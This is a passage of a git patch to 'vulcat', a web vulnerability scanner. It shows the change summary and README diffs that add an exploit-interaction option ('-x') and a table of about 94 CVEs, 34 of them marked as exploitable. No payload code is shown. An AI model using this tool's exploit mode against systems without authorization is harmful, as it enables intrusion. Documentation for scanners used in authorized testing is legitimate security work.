From b6e29d3714563a8edb511ab14c6102c335d48ca4 Mon Sep 17 00:00:00 2001 From: CLincat <3132002932@qq.com> Date: Thu, 10 Nov 2022 11:53:21 +0800 Subject: [PATCH] 20221110-v1.1.5 --- README.md | 330 +++++++++--------- README.zh-cn.md | 328 ++++++++--------- lib/core/coreScan.py | 29 +- lib/initial/config.py | 6 +- lib/initial/language.py | 90 +++-- lib/initial/list.py | 165 ++++++--- lib/initial/parse.py | 5 +- lib/plugins/exploit.py | 310 +++++++++++++++++ lib/plugins/fingerprint/webapp.py | 10 + lib/report/output.py | 26 +- lib/tool/logger.py | 32 +- lib/tool/md5.py | 46 ++- payloads/ApacheAirflow.py | 5 +- payloads/ApacheFlink.py | 9 +- payloads/ApacheHttpd.py | 19 +- payloads/ApacheSolr.py | 9 +- payloads/ApacheStruts2.py | 445 ------------------------ payloads/AtlassianConfluence.py | 52 ++- payloads/Discuz.py | 2 +- payloads/Drupal.py | 53 +-- payloads/ElasticSearch.py | 14 +- payloads/F5BIGIP.py | 15 +- payloads/Gitea.py | 8 +- payloads/Grafana.py | 16 +- payloads/Landray.py | 8 +- payloads/MiniHttpd.py | 7 +- payloads/NodeRED.py | 11 +- payloads/Nodejs.py | 10 +- payloads/RubyOnRails.py | 14 +- payloads/Spring.py | 21 +- payloads/Supervisor.py | 134 +++++++ payloads/ThinkPHP.py | 15 +- payloads/Weblogic.py | 3 +- payloads/Webmin.py | 4 +- payloads/Yonyou.py | 13 +- payloads/{ => demo}/demo.py | 0 payloads/{ => demo}/demo2.py | 0 payloads/{ => demo}/demo3.py | 0 payloads/phpMyadmin.py | 27 +- thirdparty/HackRequests/HackRequests.py | 19 +- vulcat.py | 4 +- 41 files changed, 1297 insertions(+), 1017 deletions(-) create mode 100644 lib/plugins/exploit.py delete mode 100644 payloads/ApacheStruts2.py create mode 100644 payloads/Supervisor.py rename payloads/{ => demo}/demo.py (100%) rename payloads/{ => demo}/demo2.py (100%) rename payloads/{ => demo}/demo3.py (100%) diff --git a/README.md b/README.md index 1c6968c..b3e5355 100644 --- a/README.md +++ b/README.md 
@@ -8,168 +8,16 @@ * If you have any ideas, suggestions, or bugs, you can issue **Web applications that currently support scanning:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, Supervisor, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou -## Vulnerabilitys List -
-The current web vulnerabilities that support scanning: [Click on] +**You can also check out the "Vulnerabilitys List" below to see which vulnerabilities vulcat supports scanning** -``` -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Target | Vul_id | Type | Description | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Alibaba Druid | None | unAuth | Alibaba Druid unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | Alibaba Nacos unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | Apache Airflow Authentication bypass | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX default access token | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | Apache Flink Directory traversal | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Hadoop | None | unAuth | Apache Hadoop YARN ResourceManager unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | -| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal | -| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal | 
-+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache SkyWalking | CVE-2020-9483 | SQLinject | SkyWalking SQLinject | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Solr | CVE-2017-12629 | RCE | Solr Remote code execution | -| Apache Solr | CVE-2019-17558 | RCE | Solr Remote Code Execution Via Velocity Custom Template | -| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Struts2 | S2-001 | RCE | Apache Struts2 Remote code execution | -| Apache Struts2 | S2-005 | RCE | Apache Struts2 Remote code execution | -| Apache Struts2 | S2-007 | RCE | Apache Struts2 Remote code execution | -| Apache Struts2 | S2-008 | RCE | Apache Struts2 Remote code execution | -| Apache Struts2 | S2-009 | RCE | Apache Struts2 Remote code execution | -| Apache Struts2 | S2-012 | RCE | Apache Struts2 Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | Put method writes to any file | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | AppWeb Authentication bypass | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence any file include | -| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence Directory traversal && RCE | -| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence OGNL expression command injection | -| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence Remote code execution | 
-+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | Cisco ASA/FTD XSS | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | Django debug page XSS | -| Django | CVE-2018-14574 | Redirect | Django CommonMiddleware URL Redirect | -| Django | CVE-2019-14234 | SQLinject | Django JSONfield SQLinject | -| Django | CVE-2020-9402 | SQLinject | Django GIS SQLinject | -| Django | CVE-2021-35042 | SQLinject | Django QuerySet.order_by SQLinject | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQLinject | -| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML Remote code execution | -| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 Remote code execution | -| Drupal | CVE-2018-7602 | RCE | Drupal Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch Remote code execution | -| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy Sandbox to bypass && RCE | -| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch Directory traversal | -| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch Directory traversal | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP Remote code execution | -| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP Remote code execution | 
-+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 deSerialization | -| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 deSerialization | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Gitea | None | unAuth | Gitea 1.4.0 unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth Remote code execution | -| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API SSRF | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Influxdb | None | unAuth | influxdb unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information | -| Jetty | CVE-2021-28169 | DSinfo | jetty Servlets ConcatServlet Disclosure information | -| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Jupyter | None | unAuth | Jupyter unAuthorized | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF | 
-+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution | -| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution | -| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass | -| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution | -| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal | -| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | Node-RED Directory traversal | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| phpMyadmin | WooYun-2016-199433 | unSerialize | phpMyadmin Scripts/setup.php Deserialization | -| phpMyadmin | CVE-2018-12613 | FileInclude | phpMyadmin 4.8.1 Remote File Inclusion | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| PHPUnit | CVE-2017-9841 | RCE | PHPUnit Remote code 
execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails Directory traversal | -| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails FileRead | -| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc writes to any file | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Spring | CVE-2016-4977 | RCE | Spring Security OAuth2 Remote Command Execution | -| Spring | CVE-2017-8046 | RCE | Spring Data Rest Remote Command Execution | -| Spring | CVE-2018-1273 | RCE | Spring Data Commons Remote Command Execution | -| Spring | CVE-2020-5410 | FileRead | Spring Cloud Directory traversal | -| Spring | CVE-2021-21234 | FileRead | Spring Boot Directory traversal | -| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl Remote code execution | -| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL Remote code execution | -| Spring | CVE-2022-22965 | RCE | Spring Framework Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x Remote code execution | -| ThinkPHP | CNVD-2018-24942 | RCE | The forced route is not enabled Remote code execution | -| ThinkPHP | CNNVD-201901-445 | RCE | Core class Request Remote code execution | -| ThinkPHP | None | RCE | ThinkPHP2.x Remote code execution | -| ThinkPHP | None | SQLinject | ThinkPHP5 ids SQLinject | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Ueditor | None | SSRF | Ueditor SSRF | 
-+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic SSRF | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder deSerialization | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async deSerialization | -| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic Authentication bypass | -| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic Unauthorized command execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth Remote code execution | -| Webmin | CVE-2019-15642 | RCE | Webmin Remote code execution | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -| Yonyou | CNNVD-201610-923 | SQLinject | Yonyou-GRP-U8 Proxy SQLinject | -| Yonyou | CNVD-2021-30167 | RCE | Yonyou-NC BeanShell Remote code execution | -| Yonyou | None | FileRead | Yonyou-ERP-NC NCFindWeb Directory traversal | -| Yonyou | None | DSinfo | Yonyou-U8-OA getSessionList.jsp Disclosure information | -| Yonyou | None | SQLinject | Yonyou-U8-OA test.jsp SQLinject | -+----------------------+--------------------+--------------+------------------------------------------------------------+ -``` -
- -## Code of conduct -Before using this tool, ensure that your actions comply with local laws and regulations and that you have obtained relevant authorization. +## Code of Conduct and Disclaimer +* **Before using this tool, ensure that your actions comply with local laws and regulations and that you have obtained relevant authorization.** -This tool is only for enterprises and individuals with legal authorization and is intended to enhance cyberspace security. +* **This tool is only for enterprises and individuals with legal authorization and is intended to enhance cyberspace security.** -If you commit any illegal acts or cause any serious consequences during the use of the tool, you shall bear the corresponding liabilities by yourself, and we will not assume any legal and joint liability. +* **If you commit any illegal acts or cause any serious consequences during the use of the tool, you shall bear the corresponding liabilities by yourself, and we will not assume any legal and joint liability.** ## Installation & Usage The tool is developed based on python3. Python3.8 or later is recommended @@ -184,6 +32,10 @@ pip3 install -r requirements.txt python3 vulcat.py -h ``` ``` +Usage: +By using this tool, you agree to the "Code of Conduct and Disclaimer" in "vulcat/README.md; If you do not agree, do not use this tool." + + Usage: python3 vulcat.py Examples: python3 vulcat.py -u https://www.example.com/ @@ -258,6 +110,11 @@ Options: number does not discriminate between sizes, and the symbol - and _ are acceptable (e.g. -a fastjson -v cnVD-2019-22238 or -a Tomcat -v CVE-2017_12615) + -x, --exp Use with the -a and -v parameters, After the Poc scan, + if the vulnerability exists, enter the Exp interaction + mode of the vulnerability; You can use --list to see + Exp support vulnerabilities. (e.g. -a httpd -v + CVE-2021-42013 -x) Api: The third party Api 
@@ -297,7 +154,7 @@ Options: drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak, landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered, - phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring, + phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor, skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou ``` @@ -332,7 +189,160 @@ args.ceye_token = '' 2. Then follow the tips in demo.py to fill in your own code and introduce POC into vulcat +## Vulnerabilitys List +
+The current web vulnerabilities that support scanning: [Click on] + +``` ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Target | Vuln id | Vuln Type | Exp | Description | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Alibaba Druid | None | unAuth | - | Alibaba Druid unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Alibaba Nacos | CVE-2021-29441 | unAuth | - | Alibaba Nacos unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Airflow | CVE-2020-17526 | unAuth | - | Apache Airflow Authentication bypass | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX default access token | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Flink | CVE-2020-17519 | FileRead | Y | Apache Flink Directory traversal | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Hadoop | None | unAuth | - | Apache Hadoop YARN ResourceManager unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 Directory traversal | +| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 Directory traversal | 
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQLinject | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Solr | CVE-2017-12629 | RCE | - | Solr Remote code execution | +| Apache Solr | CVE-2019-17558 | RCE | Y | Solr RCE Via Velocity Custom Template | +| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/FileRead | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Apache Tomcat | CVE-2017-12615 | FileUpload | - | Put method writes to any file | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb Authentication bypass | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence any file include | +| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Y | Confluence Directory traversal && RCE | +| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence OGNL expression command injection | +| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Cisco | CVE-2020-3580 | XSS | - | Cisco ASA/FTD XSS | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Discuz | wooyun-2010-080723 | RCE | Y | Remote code execution | 
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Django | CVE-2017-12794 | XSS | - | Django debug page XSS | +| Django | CVE-2018-14574 | Redirect | - | Django CommonMiddleware URL Redirect | +| Django | CVE-2019-14234 | SQLinject | - | Django JSONfield SQLinject | +| Django | CVE-2020-9402 | SQLinject | - | Django GIS SQLinject | +| Django | CVE-2021-35042 | SQLinject | - | Django QuerySet.order_by SQLinject | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQLinject | +| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML Remote code execution | +| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 Remote code execution | +| Drupal | CVE-2018-7602 | RCE | - | Drupal Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch Remote code execution | +| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy Sandbox to bypass && RCE | +| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch Directory traversal | +| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch Directory traversal | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP Remote code execution | +| F5 BIG-IP | CVE-2022-1388 | unAuth | Y | BIG-IP Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Fastjson | CNVD-2017-02833 | unSerialize | - | Fastjson <= 1.2.24 deSerialization | +| Fastjson | CNVD-2019-22238 | unSerialize | - | Fastjson <= 1.2.47 
deSerialization | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Gitea | None | unAuth | - | Gitea 1.4.0 unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth Remote code execution | +| Gitlab | CVE-2021-22214 | SSRF | - | Gitlab CI Lint API SSRF | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x Directory traversal | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Influxdb | None | unAuth | - | influxdb unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Jenkins | CVE-2018-1000861 | RCE | - | jenkins Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Jetty | CVE-2021-28164 | DSinfo | - | jetty Disclosure information | +| Jetty | CVE-2021-28169 | DSinfo | - | jetty Servlets ConcatServlet Disclosure information | +| Jetty | CVE-2021-34429 | DSinfo | - | jetty Disclosure information | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Jupyter | None | unAuth | - | Jupyter unAuthorized | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | - | request_uri SSRF | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Landray | CNVD-2021-28277 | 
FileRead/SSRF| Y | Landray-OA FileRead/SSRF | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd FileRead | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| mongo-express | CVE-2019-10758 | RCE | - | Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum Remote code execution | +| Nexus Repository | CVE-2019-7238 | RCE | - | 3.x Remote code execution | +| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475 Bypass | +| Nexus Repository | CVE-2020-10199 | RCE | - | 3.x Remote code execution | +| Nexus Repository | CVE-2020-10204 | RCE | - | 3.x Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js Directory traversal | +| Nodejs | CVE-2021-21315 | RCE | - | Node.js Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED Directory traversal | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php Deserialization | +| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 Remote File Inclusion | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit Remote code execution | 
++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails Directory traversal | +| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails FileRead | +| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc writes to any file | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 Remote Command Execution | +| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest Remote Command Execution | +| Spring | CVE-2018-1273 | RCE | - | Spring Data Commons Remote Command Execution | +| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud Directory traversal | +| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot Directory traversal | +| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl Remote code execution | +| Spring | CVE-2022-22963 | RCE | - | Spring Cloud Function SpEL Remote code execution | +| Spring | CVE-2022-22965 | RCE | - | Spring Framework Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Supervisor | CVE-2017-11610 | RCE | - | Supervisor Remote Command Execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x Remote code execution | +| ThinkPHP | CNVD-2018-24942 | RCE | Y | The forced route is not enabled RCE | +| ThinkPHP | CNNVD-201901-445 | RCE | Y | Core class Request Remote code execution | +| ThinkPHP | None | RCE | 
- | ThinkPHP2.x Remote code execution | +| ThinkPHP | None | SQLinject | - | ThinkPHP5 ids SQLinject | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Ueditor | None | SSRF | - | Ueditor SSRF | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic SSRF | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder deSerialization | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async deSerialization | +| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic Authentication bypass | +| Oracle Weblogic | CVE-2020-14882 | RCE | - | Weblogic Unauthorized command execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth Remote code execution | +| Webmin | CVE-2019-15642 | RCE | Y | Webmin Remote code execution | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +| Yonyou | CNNVD-201610-923 | SQLinject | - | Yonyou-GRP-U8 Proxy SQLinject | +| Yonyou | CNVD-2021-30167 | RCE | Y | Yonyou-NC BeanShell Remote code execution | +| Yonyou | None | FileRead | - | Yonyou-ERP-NC NCFindWeb Directory traversal | +| Yonyou | None | DSinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info | +| Yonyou | None | SQLinject | - | Yonyou-U8-OA test.jsp SQLinject | ++----------------------+--------------------+--------------+-----+--------------------------------------------------------------+ +vulcat-1.1.5/2022.11 +94/Poc +34/Exp +``` +
+ ## Thanks * [vulmap](https://github.com/zhzyker/vulmap) * [sqlmap](https://github.com/sqlmapproject/sqlmap) -* [dirsearch](https://github.com/maurosoria/dirsearch) \ No newline at end of file +* [dirsearch](https://github.com/maurosoria/dirsearch) +* [HackRequests](https://github.com/boy-hack/hack-requests) diff --git a/README.zh-cn.md b/README.zh-cn.md index 5abda24..e6a401b 100644 --- a/README.zh-cn.md +++ b/README.zh-cn.md @@ -7,168 +7,16 @@ * 如果有什么想法、建议或者遇到了BUG, 都可以issues **目前支持扫描的web应用程序有:** -> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheStruts2, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou +> AlibabaDruid, AlibabaNacos, ApacheAirflow, ApacheAPISIX, ApacheFlink, ApacheHadoop, ApacheHttpd, ApacheSkywalking, ApacheSolr, ApacheTomcat, AppWeb, AtlassianConfluence, Cicso, Discuz, Django, Drupal, ElasticSearch, F5-BIG-IP, Fastjson, Gitea, Gitlab, Grafana, Influxdb, RubyOnRails, Jenkins, Jetty, Jupyter, Keycloak, Landray-OA, MiniHttpd, mongo-express, Nexus, Node.js, NodeRED, phpMyAdmin, phpUnit, ShowDoc, Spring, Supervisor, ThinkPHP, Ueditor, Weblogic, Webmin, Yonyou -## 漏洞列表 -
-目前支持扫描的web漏洞有: [点击展开] +**你还可以查看下方的"漏洞列表", 查看vulcat支持扫描的漏洞** -``` -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Target | Vul_id | Type | Description | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Alibaba Druid | None | unAuth | 阿里巴巴Druid未授权访问 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | 阿里巴巴Nacos未授权访问 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | Airflow身份验证绕过 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX默认密钥 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | Flink目录遍历 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 | -+----------------------+--------------------+--------------+--------------------------------------------------------------------+ -| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF | -| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 